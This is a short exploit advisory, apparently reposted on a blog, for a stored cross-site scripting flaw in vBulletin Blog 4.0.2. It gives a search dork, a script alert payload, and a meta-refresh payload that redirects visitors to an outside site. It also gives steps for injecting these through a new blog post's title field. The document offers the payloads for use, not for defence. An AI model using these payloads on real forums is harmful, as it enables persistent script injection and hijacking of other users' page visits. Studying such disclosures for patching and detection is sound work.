Vbulletin Blog 4.0.2 XSS VulnerabilityAuthor: FormatXformat |
Version: Vbulletin 4.0.2 |
Dork: |
Powered by vBulletin™ Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved. |
The script is affected by Permanent XSS vulnerability, so you can put in bad java script code |
<script>alert('put this script in title')</script> |
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'> |
1st register |
Go to Blogs page |
Create New Post |
Inject your java script into Title Box |
You must go back to Main page to see this XSS effect. |
Greets: Neo, Sa3id, All Tkurd.net Members
Nenhum comentário:
Postar um comentário